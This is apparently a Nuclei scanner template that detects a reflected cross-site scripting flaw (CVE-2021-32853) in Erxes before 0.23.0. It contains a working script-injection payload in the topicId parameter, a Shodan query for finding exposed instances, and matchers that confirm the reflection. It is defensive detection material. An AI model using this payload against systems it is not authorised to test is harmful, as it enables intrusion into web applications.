id: CVE-2021-32853 info: name: Erxes <0.23.0 - Cross-Site Scripting author: dwisiswant0 severity: critical description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag. remediation: | Upgrade to Erxes version 0.23.0 or later to mitigate the vulnerability. reference: - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/ - https://nvd.nist.gov/vuln/detail/CVE-2021-3285 - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/views/widget.ejs#L14 - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/index.ts#L54 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H cvss-score: 9.6 cve-id: CVE-2021-32853 cwe-id: CWE-79 epss-score: 0.00585 epss-percentile: 0.75822 cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: erxes product: erxes shodan-query: http.title:"erxes" tags: cve,cve2021,xss,erxes,oss http: - method: GET path: - "{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word part: body words: - 'topic_id: "' - "window.erxesEnv" condition: and - type: word part: header words: - text/html - type: status status: - 200 # digest: 490a0046304402200d5860546f8739e65cc34f72629a9fec1ac2c627822b1de98f745e785e868b2b022035e11a0a4f2c55a2901323629baee73a5630770cdaa9c673bd86c315c02b96ea:922c64590222798bb761d5b6d8e72950